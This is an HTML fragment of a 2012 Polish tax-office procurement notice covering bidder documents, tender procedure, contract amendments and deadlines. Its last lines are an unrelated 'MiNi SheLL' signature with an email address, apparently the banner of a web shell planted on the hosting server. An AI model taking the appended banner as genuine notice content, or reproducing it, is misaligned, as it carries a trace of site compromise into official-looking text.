<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca winien również złożyć następujące dokumenty:
a)	wypełniony i podpisany formularz oferty (Rozdział III SIWZ) wraz z załącznikami,
b)	pełnomocnictwo do reprezentowania Wykonawcy, jeżeli nie wynika ono z innych złożonych dokumentów.
2. Oświadczenie podmiotów występujących wspólnie, w którym Wykonawcy zobowiązują się m.in. do:
a)	solidarnej odpowiedzialności wszystkich podmiotów w razie nie wykonania lub nienależytego wykonania przedmiotu umowy,
b)	nie rozwiązywania umowy przez któregokolwiek z Wykonawców, przed wykonaniem zobowiązań wynikających z umowy, 
c)	ustanowienia pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego z określeniem zakresu pełnomocnictwa.
Przyjmuje  się, że  pełnomocnictwo do   podpisywania   oferty   obejmuje  pełnomocnictwo  do poświadczania za zgodność z oryginałem wszystkich dokumentów.
Pełnomocnictwo musi wynikać z załączonych do oferty dokumentów oraz mieć formę pisemną. Wszelka korespondencja prowadzona będzie z Pełnomocnikiem.
d)	niedokonywania zmian w umowie bez zgody Zamawiającego,
e)	przedstawienia podziału dostaw przez poszczególnych Wykonawców.
Wykonawcy składający ofertę wspólnie winni wskazać Wykonawcę, na konto którego będą przekazywane należności z tytułu realizacji przedmiotu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę postanowień umowy oraz określa warunki zmiany:
1) zmianę wartości wynagrodzenia w przypadku zmiany stawki podatku od towarów 
i usług VAT na przedmiot zamówienia. 
          Zmiana wartości wynagrodzenia winna być wyliczona następująco:
a)	w przypadku jednakowej zmiany stawki podatku od towarów i usług VAT na   wszystkie artykuły przedmiotu zamówienia - kwota wynagrodzenia netto pozostała do wykorzystania  w chwili zmiany przepisów o podatku od towarów i usług VAT winna być odpowiednio powiększona lub zmniejszona o zmienioną stawkę podatku od towarów i usług VAT,
b)	w przypadku zmiany na różne stawki podatku od towarów i usług VAT - nowe ceny jednostkowe brutto artykułów przedmiotu zamówienia oraz ceny jednostkowe brutto nie zmienione zostaną przemnożone przez niewykorzystaną ilość danego asortymentu, następnie uzyskane wartości brutto zostaną zsumowane.
Otrzymane w powyższy sposób wynagrodzenie, po zsumowaniu z dotychczas wydatkowaną kwotą na zakup przedmiotu zamówienia, stanowić będzie wynagrodzenie z tytułu realizacji przedmiotu zamówienia.
2)	w związku ze zmianami w strukturze organizacyjnej Wykonawcy lub Zamawiającego, dopuszcza się zmiany dotyczące określonych w umowie nazw, adresów. Strony niezwłocznie poinformują się pisemnie o tych zmianach. 
3)	zmiany osób reprezentujących Strony. Strony niezwłocznie poinformują się pisemnie o tych zmianach.

2. Zmiany do umowy, o których mowa w pkt 1 ppkt 1, muszą być wprowadzone w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.usgorzow.mf.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy, ul. Jagiellończyka 10, 66-400 Gorzów Wlkp., pok. 240 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 09:15, miejsce: Urząd Skarbowy, ul. Jagiellończyka 10, 66-400 Gorzów Wlkp., pok. 240 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com